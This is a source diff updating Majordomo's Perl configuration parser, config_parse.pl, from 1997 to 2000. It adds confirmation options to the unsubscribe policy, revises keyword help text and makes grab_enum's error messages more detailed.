@@ -5,8 +5,8 @@
 # writes into the global variable %main'config_opts
 #
 
-# $Header: /sources/cvsrepos/majordomo/config_parse.pl,v 1.64 1997/08/27 14:41:32 cwilson Exp $
-# $Modified: Tue Dec 17 19:29:14 1996 by cwilson $
+# $Header: /sources/cvsrepos/majordomo/config_parse.pl,v 1.71 2000/01/07 14:00:26 cwilson Exp $
+# $Modified: Fri Jan  7 14:59:49 2000 by cwilson $
 
 # this array holds the interesting info for use by all tools
 %main'config_opts=();
@@ -90,7 +90,7 @@ $installing_defaults = 0; # Set to 1 when installing defaults, in case
 	'description',		'', # description of list, one line 55 char 
         'subscribe_policy',	"open\001closed\001auto\001open+confirm\001closed+confirm\001auto+confirm\001#!\$default_subscribe_policy ? \$default_subscribe_policy : 'open'",
 					 # open, closed, or auto.
-        'unsubscribe_policy',	"open\001closed\001auto\001open",
+        'unsubscribe_policy', "open\001closed\001auto\001open+confirm\001closed+confirm\001auto+confirm\001#!\$default_unsubscribe_policy ? \$default_unsubscribe_policy : 'open'",
 					 # open, closed, or auto.
         'mungedomain',		'no', # is user@foo.com == user@host.foo.com
         'admin_passwd',		'#!"$list.admin"',   # administration password
@@ -98,7 +98,7 @@ $installing_defaults = 0; # Set to 1 when installing defaults, in case
 	'date_info',		'yes', # date the info file when installed
 	'date_intro',		'yes', # date the intro file when installed
 	'archive_dir',		'',
-# When it works use !$main\'filedir . "/" . $baselist',
+# When it works use '#!$main\'filedir . "/" . $list',
 # stuff for resend below
         'moderate',		'no',   # Is list moderated
         'moderator',		'',	# moderator instead of owner-list
@@ -223,7 +223,6 @@ there is only room for 50 or so
 characters.",
 
 'subscribe_policy', 
-
 "One of three values: open, closed, auto; plus an optional
 modifier: '+confirm'.  Open allows people to subscribe themselves to
 the list. Auto allows anybody to subscribe anybody to the list without
@@ -234,14 +233,19 @@ subscriber which includes a authentication number which must be sent
 back in with another subscribe command.",
 
 'unsubscribe_policy', 
-"One of three values: open, closed, auto.  Open allows people to
-unsubscribe themselves from the list. Auto allows anybody to unsubscribe
-anybody to the list without maintainer approval. The existence of the
-file <listname>.auto is the same as specifying the value auto.  Closed
-requires maintainer approval for all unsubscribe requests to the
-list. In addition to the keyword, if the file <listname>.closed
-exists, it is the same as specifying the value closed. The value of
-this keyword overrides the value supplied by any existent files.",
+"One of three values: open, closed, auto; plus an optional modifier:
+'+confirm'.  Open allows people to unsubscribe themselves from the
+list. Auto allows anybody to unsubscribe anybody to the list without
+maintainer approval. The existence of the file <listname>.auto is the
+same as specifying the value auto.  Closed requires maintainer
+approval for all unsubscribe requests to the list. In addition to the
+keyword, if the file <listname>.closed exists, it is the same as
+specifying the value closed. Adding '+confirm', ie, 'auto+confirm',
+will cause majordomo to send a reply back to the subscriber if the
+request didn't come from the subscriber. The reply includes a
+authentication number which must be sent back in with another
+subscribe command.  The value of this keyword overrides the value
+supplied by any existent files.",
 
 'mungedomain', 
 "If set to yes, a different method is used to determine a matching
@@ -277,11 +281,14 @@ with an intro command. This is useful if the file is being
 looked at by some means other than majordomo (e.g. finger).",
 
 'moderate',
-"If yes, all postings to the list 
-must be approved by the moderator.",
+"If yes, all postings to the list will be
+bounced to the moderator for approval.",
 
 'moderator',
-"Send bounces to moderator instead of owner-<listname>",
+"Address for directing posts which require approval. Such
+approvals might include moderated mail, administrivia traps,
+and restrict_post authorizations. If the moderator address
+is not set, it will default to the list-approval address.",
 
 'approve_passwd',
 "Password to be used in the approved header
@@ -397,12 +404,10 @@ not currently work. Leave it blank.",
 'digest_rm_footer', "The value is the name of the list that applies
 the header and footers to the messages that are received by
 digest. This allows the list supplied headers and footers to be
-stripped before the messages are included in the digest. This keyword
-is currently non operative.",
+stripped before the messages are included in the digest.",
 
 'digest_rm_fronter',
-'Works just like digest_rm_footer, except it removes the front material.
-Just like digest_rm_footer, it is also non-operative.',
+'Works just like digest_rm_footer, except it removes the front material.',
 
 'digest_maxlines',
 "automatically generate a new digest when the size of the digest exceeds
@@ -605,7 +610,8 @@ foreach $key (sort (keys(%known_keys))) {
 	# a '-' on the line.
 	$lval =~ s/^\001/-\001/g;		# start with blank line
 	$lval =~ s/\001\001/\001-\001/g;	# embedded blank line
-	
+	$lval =~ s/\001$/\001-/g;               # trailing blank line
+
 	# if there is space, protect it with a -
 	$lval =~ s/^(\s)/-$1/g;		# the first line
 	$lval =~ s/\001(\s)/\001-$1/g;	# embedded lines
@@ -1001,6 +1007,7 @@ local($bool) = @_;
 sub grab_enum {
     local($value, $list, $key) = @_;
     local($i, @enum) = "";
+    local($default_value) = "";
 
     if ($installing_defaults) { # the value when installing defaults is
 				# the entire enumerated list, with the
@@ -1008,11 +1015,34 @@ sub grab_enum {
 	@enum = split(/\001/, $value);
 	$value = pop(@enum);
 
+	$default_value = $value;
+
 	if ( $value =~ s/^#!// ) {
+	    $default_value = $value;
+
 	    $value = eval("$value");
 	    push(@errors, $@) if $@ ne "";
+
 	}
 
+	#
+	# duplicate here for better error message during
+	# default setup.
+	#
+	foreach $i (@enum) {
+	    return $value if $value eq $i;
+	}
+	push(@errors, "$value at line $. is not a valid value.\n" .
+	     "This value was taken from the default list.\n" .
+	     "It was produced by $default_value\n" . 
+	     "So it is likely to be taken from majordomo.cf.\n" .
+	     "BTW, the line number shown here is the line number of the last line and not relevant.\n" .
+	     "The key to which the value was assigned was $key " . "\n" .
+	     "Valid values are: " . join(';', @enum) . "\nlist was $list" );
+
+	return "";
+
+
     } else {
 	@enum = split(/\001/, $known_keys{$key});
 	pop(@enum);
@@ -1021,7 +1051,11 @@ sub grab_enum {
 	return $value if $value eq $i;
     }
     push(@errors, "$value at line $. is not a valid value.\n" .
-	 "Valid values are: " . join(';', @enum) . "\n");
+	 "Valid values are: " . join(';', @enum) . "\nlist was $list" . 
+         " the key was $key " . "\n" . 
+         "installing_default was $installing_defaults" . "\n");
+
+
     return "";
 }
 
@@ -1197,9 +1231,10 @@ sub config'get_def {
 	local($digest) = undef;
 
 	# sometimes the list variable doesn't get overridden
-	$baselist = $list;
-	$baselist =~ s/.new$//; # chomp a .new extention to load
+	#$orig_list = $list;    # Does anyone ever need this?
+	$list =~ s/.new$//;     # chomp a .new extention to load
 				# a replacement file
+	$baselist = $list;      # Compatibility
 
 	&main'abort( "Improper number of args to get_def") unless defined $list;
 
@@ -1349,10 +1384,10 @@ should be less than 20 characters total length.
 
 .TP 15
 default_value
-The default value for the string. Empty quotes muct be used if the
+The default value for the string. Empty quotes must be used if the
 value is to be null. If the default value starts with the characters
 '#!', the string is eval'led in the context of the config package. The
-function config'get_def performs the evaluation. Besides the gloabl
+function config'get_def performs the evaluation. Besides the global
 values, the name of the list is available in the variable "$list", and
 the current key name is available in the variable "$key".
 
